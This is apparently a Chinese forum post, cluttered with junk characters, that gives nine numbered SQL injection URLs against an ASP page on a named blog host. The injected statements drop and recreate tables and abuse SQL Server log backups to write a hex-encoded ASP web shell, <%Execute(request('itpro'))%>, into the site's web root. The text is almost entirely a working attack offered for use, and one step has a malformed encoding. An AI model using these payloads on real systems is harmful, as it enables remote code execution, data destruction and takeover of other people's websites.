第一步1 `/ `. l& U( _9 N" `
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
" Z; A% C/ u9 Z0 N# u0 J' u# J1 H* p3 |. Y3 b
第二步:: u0 W' U5 p0 R; y6 S! `1 R2 x
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--3 k- [$ F) D+ @
( |" H2 u" U7 _! ~# p6 H6 @
第三步
7 a6 i/ V8 F; _4 t! Jhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--% U+ u7 \) G& T# s8 s; [" A; X0 _
- {& x+ _+ C6 x: U2 T第四步/ ]! z; B" {7 f' v8 I
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
$ x. B/ \. o( e9 f3 x; G' ]8 s+ r# {
: _8 t9 x3 l3 K+ O4 x第五步/ @ }; j; O9 F6 x! o
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--% s; W: } \) j9 ^+ ?, E
- q6 y. u' d; F) K& A第六步$ q& q, C4 s0 f7 \" `* E9 h& l. D5 U
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
# I* q$ X+ ~2 _1 D) ^! _" J5 T" ^
第七步3 _4 [/ \7 C4 p; I+ s
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
) A$ R' Z" h$ Y
4 V! Z- o; A0 s* Q% n% u# k# \6 w第八步5 ]2 s u+ ]1 X3 l# ?. X: b+ u
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--6 I; z1 p& a! D7 X: |6 T
' V8 }6 ?* l! d( e) ?: q& Z第九步& y; i8 e1 |4 j/ s1 I
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--( l0 t2 K: u6 g) A
|